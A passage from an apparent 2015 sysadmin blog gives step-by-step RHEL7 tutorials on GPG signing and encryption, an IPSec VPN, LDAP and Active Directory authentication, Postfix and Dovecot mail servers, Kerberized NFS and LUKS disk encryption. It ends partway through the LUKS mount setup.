Thursday 30 April 2015

Digital Signature using OpenPGP (gpg2) in RHEL7

In this tutorial, Batul will create a public-private key pair. And give her public key to her friend Shabbir so that he can verify the digital signature on files sent by her.

Batul will sign a file using her private key and send the file along with the signature to Shabbir. Shabbir will verify the signature on the file using Batul's public key.

Since nobody else knows Batul's private key, only Batul could have signed the file. So Shabbir can be sure that the file has been sent by Batul and that it has not been modified in transit. 

 
Batul's Machine:
1) Install package
[batul@server3 ~]$ sudo yum -y install gnupg2

2) Generate public-private key pair. Enter passphrase to protect the private key. 
[batul@server3 ~]$ gpg2 --gen-key

3) List the key.
[batul@server3 ~]$ gpg2 --list-key
/home/batul/.gnupg/pubring.gpg
------------------------------
pub   2048R/13A3D971 2015-04-30
uid                  batul dahod (batul's encrpt key) <batul@mycompany.com>
sub   2048R/8AE3A0FA 2015-04-30

4) Save the public key in a file.
[batul@server3 ~]$ gpg2 --export "batul dahod" > batul.pub

5) The public key file 'batul.pub' is given to Batul's friend Shabbir , so that he can verify the digital signature on files sent by her.

6) Create a digital signature on the file 'hello.txt'
 [batul@server3 ~]$ gpg2 --armor --detach-sign hello.txt

You need a passphrase to unlock the secret key for
user: "batul dahod (batul's encrpt key) <batul@mycompany.com>"
2048-bit RSA key, ID 13A3D971, created 2015-04-30

7) Send the file 'hello.txt' and the signature file 'hello.txt.asc' to Shabbir.

 Shabbir's Machine:
1) Install Batul's public key
[shabbir@meru ~]$ gpg2 --import batul.pub
gpg: key 13A3D971: public key "batul dahod (batul's encrpt key) <batul@mycompany.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

2) Verify digital signature on the file 'hello.txt' using the signature file 'hello.txt.asc'
[shabbir@meru ~]$ gpg2 --verify hello.txt.asc hello.txt
gpg: Signature made Thu 30 Apr 2015 05:48:32 PM IST using RSA key ID 13A3D971
gpg: Good signature from "batul dahod (batul's encrpt key) <batul@mycompany.com>"

File Encryption using OpenPGP (gpg2) in RHEL7

In this tutorial, Batul will create a public-private key pair. And give her public key to her friend Shabbir so that he can send encrypted files to her.

Shabbir will encrypt a file using Batul's public key and send the encrypted file to her. Batul will decrypt the encrypted file using her private key.

Since nobody else knows Batul's private key, only Batul can decrypt the encrypted file. 

Batul's Machine:

1) Install package
[batul@server3 ~]$ sudo yum -y install gnupg2

2) Generate public-private key pair. Enter passphrase to protect the private key. 
[batul@server3 ~]$ gpg2 --gen-key


3) List the key.
[batul@server3 ~]$ gpg2 --list-key
/home/batul/.gnupg/pubring.gpg
------------------------------
pub   2048R/13A3D971 2015-04-30
uid                  batul dahod (batul's encrpt key) <batul@mycompany.com>
sub   2048R/8AE3A0FA 2015-04-30

4) Save the public key in a file.
[batul@server3 ~]$ gpg2 --export "batul dahod" > batul.pub

5) The public key file 'batul.pub' is given to Batul's friend Shabbir , so that he can send encrypted files to her.

Shabbir's Machine:
1) Install Batul's public key
[shabbir@meru ~]$ gpg2 --import batul.pub
gpg: key 13A3D971: public key "batul dahod (batul's encrpt key) <batul@mycompany.com>" imported
gpg: Total number processed: 1
gpg:               imported: 1  (RSA: 1)

2) Encrypt a file 'hello.txt' using Batul's public key.
[shabbir@meru ~]$ gpg2 --armor -r "batul dahod" --encrypt hello.txt
gpg: 8AE3A0FA: There is no assurance this key belongs to the named user

pub  2048R/8AE3A0FA 2015-04-30 batul dahod (batul's encrpt key) <batul@mycompany.com>
 Primary key fingerprint: 71D0 897E 301A F5E7 17F8  BE8B BBA6 CC6A 13A3 D971
      Subkey fingerprint: 545F FBB1 A579 6AE0 F7B6  CEFD 9E6A AFAB 8AE3 A0FA

It is NOT certain that the key belongs to the person named
in the user ID.  If you *really* know what you are doing,
you may answer the next question with yes.

Use this key anyway? (y/N) y








3) Send the encrypted file 'hello.txt.asc' to Batul.




Batul's Machine:
1) Decrypt the file 'hello.txt.asc' using the private key
[batul@server3 ~]$ gpg2 --output hello.txt --decrypt hello.txt.asc

You need a passphrase to unlock the secret key for
user: "batul dahod (batul's encrpt key) <batul@mycompany.com>"
2048-bit RSA key, ID 8AE3A0FA, created 2015-04-30 (main key ID 13A3D971)

gpg: encrypted with 2048-bit RSA key, ID 8AE3A0FA, created 2015-04-30
      "batul dahod (batul's encrpt key) <batul@mycompany.com>"

2) View the unencrypted file 'hello.txt'.
[batul@server3 ~]$ cat hello.txt
my name is shabbir rangwala

Wednesday 29 April 2015

IPSec VPN (PSK Authentication) using Libreswan in RHEL7

Pre-Shared Key (PSK) Authentication:

PSK Authentication is based on both the hosts having a "shared" secret key. Both the hosts should have the same secret key to authenticate each other.

The security of a PSK system is based on the PSK being secret. Therefore, a major issue is the secure distribution of the PSK to remote hosts.    

Consider 2 hosts: 192.168.122.2 and 192.168.122.3
An IPSec VPN tunnel will be established between these 2 hosts.
 
On both the machines, run the following commands:
 1) Install package
     yum -y install libreswan

2) Open firewall ports. 500/udp, protocol=esp
     firewall-cmd --zone=public --add-port=500/udp --permanent
     firewall-cmd --add-rich-rule='rule protocol value="esp" accept' --permanent
     firewall-cmd --reload

3) Edit the file '/etc/ipsec.secrets' and add the following entry.
      192.168.122.2 192.168.122.3 : PSK "!shabbir2009@"

4) Edit the file '/etc/ipsec.conf' and add the following entry.
      conn mytunnel
          left=192.168.122.2
          right=192.168.122.3
          authby=secret
          auto=add

     Note: Remember to maintain indentation as shown above. Also don't leave any blank lines in between the entries..

5) Start the service
       systemctl start ipsec

On any one machine, run the following commands:
6) Add the connection to the internal database.
      ipsec auto --add mytunnel
   
7) Establish  the connection.
      ipsec auto --up mytunnel
      
8) View Status
      ipsec auto --status

Tuesday 28 April 2015

LDAP Authentication Server and Client in RHEL7

When a user logs into a system, that user presents some sort of credential to establish the user identity. The system then checks those credentials against the configured authentication service. If the credentials match and the user account is active, then the user is authenticated
The information to verify the user can be located on the local system or the local system can reference a user database on a remote system, such as LDAP or Kerberos.

A local system can use a variety of different data stores for user information, including Lightweight Directory Access Protocol (LDAP), Network Information Service (NIS), and Winbind. Additionally, both LDAP and NIS data stores can use Kerberos to authenticate users.

LDAP is often used by organizations as a central repository for user information and as an authentication service.

LDAP allows password authentication or Kerberos authentication.
The LDAP password option requires either a secure (ldaps://) URL or the TLS option to connect to the LDAP server.

In this tutorial, we will use LDAP for both identity lookup and authentication. LDAP server is configured to store the username, passwords of all users. Client machines will authenticate against this central directory service. We will use Start TLS to encrypt the connections to the LDAP server. This enables a secure connection over a standard port.

We will create an LDAP server and migrate existing '/etc/passwd' and '/etc/shadow' files to the LDAP server. Then we will configure a client machine to authenticate against this LDAP server.

Configure  LDAP Authentication Server


LDAP Server Name: oserver1.mycompany.com


1) Install packages.
[root@oserver1 ~]# yum install openldap-servers openldap-clients migration-tools

2) Start ldap server.
[root@oserver1 ~]# systemctl start slapd

3) Configure ldap client file '/etc/openldap/ldap.conf'. Edit the following entries.
       BASE dc=my-domain,dc=com 
       URI ldap://localhost


4) Verify operation of ldap server
[root@oserver1 ~]# ldapsearch -x -b '' -s base '(objectClass=*)' namingContexts

5) Add the cosine and nis LDAP schemas. These schemas contain definitions for the /etc/passwd and /etc/shadow files.
[root@oserver1 ~]# ldapadd -Y EXTERNAL -H ldapi:/// -D "cn=config" -f cosine.ldif
[root@oserver1 ~]# ldapadd -Y EXTERNAL -H ldapi:/// -D "cn=config" -f nis.ldif

6) Set root password.
    6.1)Create a file 'passwd.ldif' with the following entries.
       dn: olcDatabase={2}hdb,cn=config
       changetype: modify
       replace: olcRootPW
       olcRootPW: secret

    6.2) Make entry
[root@oserver1 ~]# ldapmodify -Y EXTERNAL -H ldapi:/// -f passwd.ldif

7) Add base domain entry.
   7.1)Create a file 'base.ldif' with the following entries.
       dn: dc=my-domain,dc=com
       dc: my-domain
       objectClass: top
       objectClass: domain

       dn: ou=People,dc=my-domain,dc=com
       ou: People
       objectClass: top
       objectClass: organizationalUnit

       dn: ou=Group,dc=my-domain,dc=com
       ou: Group
       objectClass: top
       objectClass: organizationalUnit

    7.2) Add the entry.
[root@oserver1 ~]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f base.ldif -w secret

8) Convert '/etc/passwd', '/etc/group' into ldif format and add to ldap database.
[root@oserver1 ~]# cd /usr/share/migrationtools
[root@oserver1 migrationtools]# grep ":10[0-9][0-9]" /etc/passwd > passwd
[root@oserver1 migrationtools]# ./migrate_passwd.pl  passwd users.ldif
[root@oserver1 migrationtools]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f users.ldif -w secret

[root@oserver1 migrationtools]# grep ":10[0-9][0-9]" /etc/group > group
[root@oserver1 migrationtools]# ./migrate_group.pl  group groups.ldif
[root@oserver1 migrationtools]# ldapadd -x -D "cn=Manager,dc=my-domain,dc=com" -f groups.ldif -w secret
[root@oserver1 migrationtools]# cd

9) Open Firewall
[root@oserver1 ~]# firewall-cmd --zone=public --add-service=ldap --permanent
[root@oserver1 ~]# firewall-cmd --reload

10) Create Server Certificate. Follow the following steps:
    10.1) Create a local Certificate Authority (CA).
[root@oserver1 ~]# /etc/pki/tls/misc/CA  -newca

    10.2) Create public-private key pair
[root@oserver1 ~]#  openssl genrsa -out ldapserver.key

    10.3) Create a certificate signing request (CSR)
[root@oserver1 ~]# openssl req -new -key ldapserver.key -out ldapserver.csr

    10.4) Sign the certificate with the local CA.
[root@oserver1 ~]# openssl ca -in ldapserver.csr -out ldapserver.crt

   10.5) Copy the files 'ldapserver.key' and 'ldapserver.crt' to the dir. '/etc/openldap/certs/'

   10.6) We have to copy the CA cert file '/etc/pki/CA/cacert.pem' to the dir '/etc/openldap/cacerts/' on every client machine.

    10.7)Create a file 'cert.ldif' with the following entries.
          dn: cn=config
          changetype: modify
          replace: olcTLSCertificateFile
          olcTLSCertificateFile: /etc/openldap/certs/ldapserver.crt

          dn: cn=config
          changetype: modify
          replace: olcTLSCertificateKeyFile
          olcTLSCertificateKeyFile: /etc/openldap/certs/ldapserver.key


     10.8) Make entry
[root@oserver1 ~]# ldapmodify -Y EXTERNAL -H ldapi:/// -f cert.ldif

11) Configure logging.
    11.1) Edit the file '/etc/rsyslog.conf' and add the following entry.
              local4.*                    /var/log/ldap.log

    11.2) Restart rsyslog
[root@oserver1 ~]# systemctl restart rsyslog  

12) Restart the server.
[root@oserver1 ~]# systemctl restart slapd

13) Test the server
[root@oserver1 ~]# ldapsearch -x '(uid=*)' 


Configure Client for LDAP Authentication


We use the System Security Services Daemon (SSSD)  for user information services and authentication, instead of  the  legacy services.

We use the authconfig tool for authentication configuration.
 If --test action is specified, the authconfig just  reads  the  current settings  from the various configuration files and prints their values. If --update action is specified, authconfig must be  run  by  root, and configuration changes are saved.

Each  --enable has a matching --disable option that disables the service if it  is  already  enabled.      

Perform the following steps on the client machine:

1) Install Packages.
[root@meru ~]#    yum -y install openldap-clients authconfig sssd*

2) Configure authentication using 'authconfig'.
[root@meru ~]#    authconfig --enableldap --enableldapauth --ldapserver="ldap://oserver1.mycompany.com:389"  --ldapbasedn="dc=my-domain,dc=com" --passalgo=sha512 --enableldaptls  --enablemkhomedir  --update


Where,
--enableldap -> Use LDAP as an Identity Store. Configures user information services in /etc/nsswitch.conf. 

--enableldapauth -> Use LDAP as the Authentication method. Configures  authentication functions  via  /etc/pam.d/system-auth.

--ldapserver="ldap://oserver1.mycompany.com:389" -> The URL of the LDAP Server. This usually requires both the host name and port number of the LDAP server.

--ldapbasedn="dc=my-domain,dc=com" -> gives the root suffix or distinguished name (DN) for the user directory. All of the user entries used for identity/authentication will exist below this parent entry.

--enableldaptls -> sets whether to use Start TLS to encrypt the connections to the LDAP server. This enables a secure connection over a standard port. We will later retrieve the issuing CA certificate for the LDAP server and configure it in 'sssd'.

--passalgo=sha512 -> The algorithm used for storing password hashes.

--enablemkhomedir -> Create home directory on first login


3) Verify the settings.
[root@meru ~]# authconfig --test


4) Install C.A. Certificate
    3.1) Copy C.A. Certificate 'cacert.pem' from the server to the dir '/etc/openldap/cacerts/'

    3.2) Edit the file '/etc/sssd/sssd.conf' and add the following entry
           ldap_tls_cacert = /etc/openldap/cacerts/cacert.pem

    3.3) Restart sssd
[root@meru ~]# systemctl restart sssd

    3.4) Edit the file '/etc/openldap/ldap.conf' and add the following entry
           TLS_CACERT = /etc/openldap/cacerts/cacert.pem

5) Test the connection. Consider user 'shabbir'. Comment the entry for user 'shabbir' in '/etc/passwd' if it exists. Then execute the below command.

root@meru ~]#  getent passwd shabbir
shabbir:*:1000:1000:shabbir:/home/shabbir:/bin/bash

[root@meru ~]# ldapsearch -x '(uid=shabbir)'   


6) Log in into the machine as user 'shabbir' and password as given  in the LDAP database.
  

Monday 27 April 2015

Add RHEL7 Server to Active Directory Domain



This tutorial is based on the following configuration:
domain name : mycompany.com
workgroup : MYCOMPANY
kerberos realm : MYCOMPANY.COM

Windows Server DNS Name: winserver.mycompany.com
Windows Server IP Address: 192.168.122.10

Linux Server DNS Name: server3.mycompany.com
Linux Server IP Address: 192.168.122.4

Ensure that DNS Server is properly configured on the Windows Server.

1) Install packages
yum install krb5-workstation pam_krb5

yum install samba samba-client samba-winbind

yum install authconfig



2) Ensure that the clocks on both systems are in sync. Time synchronization is essential for Kerberos to work.

3) Configure the DNS Service to use AD as its name server. DNS is critical for proper resolution of host names and domains for kerberos.
Edit the file '/etc/resolv.conf' and add the following entries:
search mycompany.com

nameserver 192.168.122.10


4) Configure Kerberos to use AD Kerberos realm. Edit the file '/etc/krb5.conf'.
[logging]
default = FILE:/var/log/krb5libs.log
kdc = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log

[libdefaults]
dns_lookup_realm = true
dns_lookup_kdc = true

ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
default_realm = MYCOMPANY.COM

5) Verify Kerberos operation.

[root@server3 ~]# kinit Administrator
Password for Administrator@MYCOMPANY.COM:
[root@server3 ~]# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: Administrator@MYCOMPANY.COM

Valid starting Expires Service principal
04/27/2015 00:42:19 04/27/2015 10:42:19 krbtgt/MYCOMPANY.COM@MYCOMPANY.COM
renew until 05/04/2015 00:42:10
[root@server3 ~]# kdestroy

6) Configure Samba to connect to AD server. Edit the file '/etc/samba/smb.conf' and make the
following changes:

workgroup = MYCOMPANY

server string = Samba Server Version %v



netbios name = SERVER3



interfaces = lo eth0 192.168.122.4/24

hosts allow = 127. 192.168.122.



security = ads

passdb backend = tdbsam

realm = MYCOMPANY.COM



kerberos method = secrets and keytab



template shell = /bin/sh

winbind offline logon = true



winbind separator = +

winbind use default domain = yes



idmap uid = 10000-19999

idmap gid = 10000-19999

idmap config MYCOMPANY:backend = rid

idmap config MYCOMPANY:range = 10000000-19999999



7) Check for configuration errors
testparm

8) Configure NSS and PAM to use winbind
authconfig –enablewinbind –enablewins –enablewinbindauth --update

9) Start services
systemctl start smb
systemctl start winbind

10) Add the linux machine to the AD Domain
[root@server3 ~]# kinit Administrator

[root@server3 ~]# net ads join -U Administrator
Enter Administrator's password:
Using short domain name -- MYCOMPANY
Joined 'SERVER3' to dns domain 'mycompany.com'

10) Verify AD Server status

[root@server3 ~]# klist -k
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
3 SERVER3$@MYCOMPANY.COM

[root@server3 ~]# net ads info
LDAP server: 192.168.122.10
LDAP server name: WINSERVER.mycompany.com
Realm: MYCOMPANY.COM
Bind Path: dc=MYCOMPANY,dc=COM
LDAP port: 389
Server time: Mon, 27 Apr 2015 21:51:54 IST
KDC server: 192.168.122.10
Server time offset: 19835

Thursday 23 April 2015

Postfix SMTP AUTH and STARTTLS in RHEL7

SMTP AUTH:
The problem with SMTP protocol is that it does not require authentication. So anyone can send mail through your email server. This has lead to the problem of spam. 

To prevent an attacker from using your mail server to relay their spam, an email server is generally configured to relay mail only from the local site's address range. This creates a problem for roaming users. The solution is SMTP AUTH , which requires mail senders to authenticate before submitting messages.

SMTP AUTH is used to allow roaming users to relay mail through a server safely without configuring the SMTP server to be an open relay. Postfix's SMTP AUTH uses an authentication library called SASL, which is not part of Postfix itself. Postfix can use either the Cyrus library or Dovecot as a source for SASL authentication. This tutorial uses Dovecot as a source for SASL authentication.

SMTP STARTTLS:
Normally SMTP is transmitted as cleartext over the wire, making it vulnerable to both passive sniffing and active alteration via man-in-the-middle attacks. SMTP STARTTLS, which compliant ESMTP clients and servers can use to encrypt the SMTP session.

Typically, this is done by first starting TLS, to encrypt the SMTP session, and then issuing the SMTP AUTH command, to authenticate the client; this combination ensures that the username and password transferred as part of the SMTP AUTH are protected by the TLS encrypted session.
 
NOTE:
- Ensure that DNS Server is configured for the network.
- Ensure MX record entry for the domain is made in the DNS Server zone file.
- Ensure reverse dns entry for the mail server is made in the DNS Server zone file.
- To check for errors, view the log file '/var/log/maillog'

This tutorial is based on the following configuration:
- Domain Name: mycompany.com
- Email Gateway Name: meru.mycompany.com
- Email Gateway IP address: 192.168.122.1
- Network served by the mail gateway: 192.168.122.0/24

IMPORTANT: This tutorial assumes that 'dovecot' has been installed and configured. For dovecot installation and configuration refer to this post.

This tutorial is divided into 2 parts:
PART 1) Configuration of SMTP AUTH
PART 2) Configuration of STARTTLS

PART 1) Configuration of SMTP AUTH


Postfix Incoming/Outgoing Server (Gateway) Configuration: This server will receive incoming mail for the domain. And relay outgoing mail from client machines.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com


    #the default domain name to append if @domain is missing
    myorigin = $mydomain

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all
    # remember to comment this line
   #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain


   #Trusted SMTP clients - can relay mail through this server.  
    mynetworks = 192.168.122.0/24, 127.0.0.0/8


    #enable SMTP AUTH through SASL
     smtpd_sasl_auth_enable = yes

    #tells SASL to use dovecot for authentication
    smtpd_sasl_type = dovecot

    #the sasl path
    smtpd_sasl_path = private/auth

    #prevent anonymous authentications
    smtpd_sasl_security_options = noanonymous

    #allow authentication from non standard clients such as Microsoft Outlook
    broken_sasl_auth_clients = yes

    #allow authenticated users, allow networks configured with the mynetworks directive, reject destinations other than the postfix server
    smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination


2) To view the parameters changed run the following command.
     postconf -n

3) To check for systax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Edit the file  '/etc/dovecot/conf.d/10-master.conf' and make the following changes. This is the socket through which postfix communicates with dovecot for the authentication info.
    service auth {
      unix_listener /var/spool/postfix/private/auth {
       group = postfix
       mode = 0660
       user = postfix
     }
    }


6) Restart postfix service
    systemctl restart postfix 

7) Restart dovecot  
     systemctl restart dovecot

 

PART 2) Configuration of STARTTLS

1) Create Server Certificate. Follow the following steps:
    1.1) Create local CA (Certificate Authority)
            /etc/pki/tls/misc/CA  -newca

    1.2) Create public-private key pair
          openssl genrsa -out postfixkey.pem

    1.3) Create a certificate signing request (CSR)
          openssl req -new -key postfixkey.pem -out postfix.csr

    1.4) Sign the Certificate.
          openssl ca -in postfix.csr -out postfixcert.pem
   1.5) Copy the CA cert file '/etc/pki/CA/cacert.pem'.


2) The CA certificate file 'cacert.pem', Server Certificate file 'postfixcert.pem' and Server key file 'postfixkey.pem' is copied to the '/etc/postfix/certs/' directory.

3) Edit the file '/etc/postfix/main.cf'. Make the following changes

       #Certificate file of the CA who has signed the server certificate
       smtpd_tls_CAfile = /etc/postfix/certs/cacert.pem

       #Server certificate 
       smtpd_tls_cert_file = /etc/postfix/certs/postfixcert.pem

       #Server private key
       smtpd_tls_key_file = /etc/postfix/certs/postfixkey.pem

       #not to require STARTTLS for all SMTP exchanges
       smtpd_tls_security_level = may

       #require STARTTLS for SMTP AUTH.
       smtpd_tls_auth_only = yes

2) To view the parameters changed run the following command.
     postconf -n

3) To check for systax errors, run the following command.
     postfix check


4) Restart postfix service
    systemctl restart postfix



Wednesday 22 April 2015

POP, IMAP using Dovecot in RHEL7

POP and IMAP are 2 protocols to retrieve mail from a mail server.

POP is best for users who have one system on which to read email. Email clients generally delete messages from the server, after downloading. However, this setting can be changed. Also, the entire content of each message is downloaded.

IMAP is best for users who access their email using multiple machines. Email messages remain on the server, where users can read or delete them. IMAP also allows client apps to create mail dir(s) on the server. Also, only email header information is downloaded for messages, until opened.

Follow the following steps:

1) Install packages
     yum -y install dovecot
     yum -y install mutt

2) Edit the file '/etc/dovecot/dovecot.conf' and make the following changes.
     protocols = imap pop3 

3) Edit the file '/etc/dovecot/conf.d/10-mail.conf' and make the following changes.
     mail_location = mbox:~/mail:INBOX=/var/mail/%u

4) Edit the file '/etc/dovecot/conf.d/10-auth.conf' and make the following changes.
     auth_mechanisms = plain login

5) Change permission for mail spool file.
     cd /var/spool/mail
     chmod 600 *

6) Create new Dovecot self-signed certificate (Optional)  
    6.1)Edit the file '/etc/pki/dovecot/dovecot-openssl.cnf' and enter server hostname and other details.

    6.2)Delete default certificate and private key
           rm /etc/pki/dovecot/private/dovecot.pem
           rm /etc/pki/dovecot/certs/dovecot.pem


    6.3)Run the following script to generate new certificate.
           /usr/libexec/dovecot/mkcert.sh

    6.4)Edit in file '/etc/dovecot/conf.d/10-ssl.conf'
           ssl_cert = </etc/pki/dovecot/certs/dovecot.pem
           ssl_key = </etc/pki/dovecot/private/dovecot.pem


7) Verify parameters changed in config files.
        doveconf  -n 

8) Start the service.
      systemctl start dovecot     
      systemctl enable dovecot

9) Open Firewall ports.(POP3-110/tcp,IMAP-143/tcp, POP3S-995/tcp, IMAPS-993/tcp)
      firewall-cmd --zone=public --add-service=pop3s --permanent
      firewall-cmd --zone=public --add-service=imaps --permanent
      firewall-cmd --zone=public --add-port=110/tcp --permanent
      firewall-cmd --zone=public --add-port=143/tcp --permanent

10) Check the connection
      mutt -f pops://meru.mycompany.com

Tuesday 21 April 2015

Postfix Server for a domain in RHEL7/CentOS7

In this tutorial, we will configure an email server (gateway) for a domain 'mycompany.com'. This central email gateway will receive all mail for the domain. And also, send all mail originating from the internal network. In other words, it will act as a single entry/exit point for all incoming and outgoing mail.

Client machines in the network will relay outgoing mail through the mail gateway. And client machines can read incoming mail from the mail gateway by using POP or IMAP. 

NOTE:
- Ensure that DNS Server is configured for the network.
- Ensure MX record entry for the domain is made in the DNS Server zone file.
- Ensure reverse dns entry for the mail server is made in the DNS Server zone file. (Not necessary for this tutorial)
- To check for errors, view the log file '/var/log/maillog'

This tutorial is based on the following configuration:
- Domain Name: mycompany.com
- Email Gateway Name: meru.mycompany.com
- Email Gateway IP address: 192.168.122.1
- Network served by the mail gateway: 192.168.122.0/24

Postfix Incoming/Outgoing Server (Gateway) Configuration: This server will receive incoming mail for the domain. And relay outgoing mail from client machines.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com


    #the default domain name to append if @domain is missing
    myorigin = $mydomain

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all
    # remember to comment this line
   #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain


   #Trusted SMTP clients - can relay mail through this server.  
    mynetworks = 192.168.122.0/24, 127.0.0.0/8

2) To view the parameters changed run the following command.
     postconf -n

3) To check for systax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix


Postfix Client Configuration(Submission-only mode): These machines will not receive mail over the network. And will relay outgoing mail through the Postfix Server configured above.

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    myhostname = meru.mycompany.com
    mydomain = mycompany.com

    #the default domain name to append if @domain is missing
    myorigin = $myhostname

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = localhost


    #the domains for which this machine is the final destination.
    mydestination = localhost

    #the mail gateway to send mail to.(The server configured above)
     relayhost = [192.168.122.1]     

2) To view the parameters changed run the following command.
     postconf -n

3) To check for systax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix

Postfix Server for a Stand-alone host in RHEL7

In this tutorial, we configure Postfix Email Server for a stand-alone host, which can send and receive mail.

NOTE:
- Ensure that DNS Server is configured for the network.
- To check for errors, view the log file 'var/log/maillog'

1) Edit the file '/etc/postfix/main.cf'. Make the following changes

    #the hostname of the machine
    myhostname = meru.mycompany.com
 

    # the domain name
    mydomain = mycompany.com  

    #the default domain name to append if @domain is missing
    myorigin = $myhostname

    # the network interface addresses on which to receive incoming mail.
    inet_interfaces = all

    # remember to comment this line
    #inet_interfaces = localhost

    #the domains for which this machine is the final destination.
    mydestination = $myhostname, localhost.$mydomain, localhost

2) To view the parameters changed run the following command.
     postconf -n

3) To check for systax errors, run the following command.
     postfix check

4) Open firewall port 25/TCP.
    firewall-cmd --zone=public --add-service=smtp --permanent
    firewall-cmd --reload

5) Restart postfix service
    systemctl restart postfix

Monday 20 April 2015

Kerberized NFS in RHEL7/CentOS7

The problem with NFS is that it doesnot have host-based authentication. So NFS is vulnerable to man-in-the-middle attack. By using Kerberos, hosts are required to prove their identity before mounting, instead of blindly assuming that the IP they are connecting to is genuine.

For Kerberos Server configuration, refer to this post.

 NOTE: 1) Ensure that DNS Server or '/etc/hosts' file is configured for the network.
             2) Ensure that Time Synchronization is configured on all machines in the network.
             3) All commands are to be executed as 'root' user.

Consider the following scenario:

Kerberos Realm: MYCOMPANY.COM
DNS Domain Name: mycompany.com
Kerberos KDC: meru.mycompany.com
Kerberos Admin Server: meru.mycompany.com

NFS Server: server3.mycompany.com
NFS Client: server1.mycompany.com


Configure NFS Server (server3.mycompany.com):

1) Install packages.
[root@server3 ~]# yum -y install krb5-workstation krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM



   
3) Create nfs principal in the kerberos database and extract keys for the nfs server.
[root@server3 ~]# kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey nfs/server3.mycompany.com

          kadmin:  ktadd nfs/server3.mycompany.com
          kadmin:  quit

4) View Keytab entry.
[root@server3 ~]# klist -k

5) Edit the file '/etc/exports' and enable kerberos authentication.
       /home/shabbir   server1.mycompany.com(rw,sec=krb5)


6) Export the dir
[root@server3 ~]# exportfs -avr

7) Start NFS Secure Server and make sure firewall port is open.
[root@server3 ~]# systemctl start nfs-secure-server

[root@server3 ~]# firewall-cmd --zone=public --add-service=nfs --permanent 
[root@server3 ~]# firewall-cmd --reload


Configure NFS Client (server1.mycompany.com):

1) Install packages.
[root@server1 ~]# yum -y install krb5-workstation krb5-libs

2) Edit the file '/etc/krb5.conf'. Make the following changes.
     
       default_realm = MYCOMPANY.COM
       [realms]
       MYCOMPANY.COM = {
       kdc = meru.mycompany.com
       admin_server = meru.mycompany.com
       }

       [domain_realm]
       .mycompany.com = MYCOMPANY.COM
       mycompany.com = MYCOMPANY.COM



3) Create nfs principal in the kerberos database and extract keys for the nfs client.
[root@server1 ~]#     kadmin -p shabbir/admin -w shabbir
          kadmin:  addprinc -randkey nfs/server1.mycompany.com

          kadmin:  ktadd nfs/server1.mycompany.com
          kadmin:  quit

4) View Keytab entry.
[root@server1 ~]# klist -k

5) Start NFS Secure Service.
[root@server1 ~]# systemctl start nfs-secure


6) Mount the exported dir.
[root@server1 ~]# mount -t nfs4  -o sec=krb5  server3.mycompany.com:/home/shabbir  /mnt

7) Login as user 'shabbir' and obtain a  ticket. We assume that user principal for 'shabbir' exists in the Kerberos database.
[root@server1 ~]# su - shabbir
[shabbir@server1 ~]$ kinit shabbir
Password for shabbir@MYCOMPANY.COM:

8) View the ticket
[shabbir@server1 ~]$ klist
Ticket cache: KEYRING:persistent:0:0
Default principal: shabbir@MYCOMPANY.COM

Valid starting       Expires              Service principal
06/06/2015 15:16:28  06/07/2015 15:16:28  krbtgt/MYCOMPANY.COM@MYCOMPANY.COM
    renew until 06/06/2015 15:16:28


9) Access the mounted dir.
[shabbir@server1 ~]$ cd /mnt
[shabbir@server1 ~]$ touch foo123

10) Destroy the ticket.
[shabbir@server1 ~]$ kdestroy


Disk Encryption using LUKS in RHEL7/CentOS7

NOTE: All commands are to be executed as 'root' user.

Consider disk '/dev/sdb'

1) Ensure dm_crypt module is loaded.
       lsmod | grep dm_crypt
        dm_crypt               23138  0
        dm_mod                102999  19 dm_log,dm_mirror,dm_crypt

    Else load the module
       modprobe dm_crypt

2) Install the package
       yum -y install cryptsetup

3) Create partition '/dev/sdb1' using 'fdisk' or 'parted'.

4) Initialize a LUKS partition and set passphrase
       cryptsetup luksFormat /dev/sdb1

5) Open the LUKS device and  map to 'data'.
       cryptsetup luksOpen /dev/sdb1 data
     The device can now be accessed as '/dev/mapper/data'

6) Create a filesystem on the mapped device.
       mkfs -t xfs /dev/mapper/data

7) Create mount point.
       mkdir -p /var/pub
      
8) Mount the mapped device.
       mount /dev/mapper/data  /var/pub

9) To automatically mount at boot time.
     9.1) Create entry in '/etc/crypttab'
              data     /dev/sdb1

                          OR

                 data     UUID=09e60914-5cf6-4290-a465-2851053d19a2
 
   
     9.2) Create entry in '/etc/fstab'
              /dev/mapper/data    /var/pub    xfs     defaults     1 2

                                                OR

